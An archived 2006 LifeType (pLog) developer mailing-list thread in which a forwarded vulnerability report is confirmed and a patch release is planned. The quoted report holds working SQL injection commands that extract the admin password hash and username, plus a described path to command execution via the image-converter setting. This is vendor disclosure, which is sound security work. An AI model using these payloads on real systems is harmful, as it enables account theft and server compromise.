[pLog-svn] Fwd: Security problem
Mark Wu
markplace at gmail.com
Mon Jul 3 16:23:15 GMT 2006
Ye, I think I can confirm this.
I rememver I fixed this bug 1.1 sometime ago.... But I don't know some can
use it to inject sql ...
We need to backport the fix from 1.1 to 1.0, too.
That means we will have a 1.0.6 soon.
Mark
> -----Original Message-----
> From: plog-svn-bounces at devel.lifetype.net
> [mailto:plog-svn-bounces at devel.lifetype.net] On Behalf Of
> Oscar Renalias
> Sent: Monday, July 03, 2006 11:58 PM
> To: plog-svn at devel.lifetype.net
> Subject: [pLog-svn] Fwd: Security problem
>
> Can somebody quickly investigate this?
>
> ---------- Forwarded message ----------
> From: A. Ramos <aramosf at unsec.net>
> Date: Jul 3, 2006 5:45 PM
> Subject: Security problem
> To: contact at lifetype.net
>
>
> Hello :-)
>
> They are one sql injection in latest version of lifetype:
>
>
> To get md5 passwd:
> perl -MLWP::Simple -e "getprint
> 'http://localhost/index.php?op=Default&Date=200607\'%20UNION%2
> 0SELECT%201,password,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE
> %20id=\'1\'/*&blogId=1'"
> | perl -ne 'print "password: ".$1."\n" if /articleId=(\w*).*h3/'
>
> To get admin username:
> perl -MLWP::Simple -e "getprint
> 'http://localhost/index.php?op=Default&Date=200607\'%20UNION%2
> 0SELECT%201,user,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20i
> d=\'1\'/*&blogId=1'"
> | perl -ne 'print "admin: ".$1."\n" if /articleId=(\w*).*h3/'
>
> And if you can access to the admin control panel, you can run
> commands in the system changing the value of /usr/bin/convert
> and put your own command. Upload some picture and wait to
> resize with the evil command.
>
> I think they are more bugs but I havent time to check for more.
>
> Thank you.
>
> --
>
> A. Ramos <aka dab>
> mailto: <aramosf at unsec.net>
> http://www.unsec.net
> _______________________________________________
> pLog-svn mailing list
> pLog-svn at devel.lifetype.net
> http://devel.lifetype.net/mailman/listinfo/plog-svn
More information about the pLog-svn
mailing list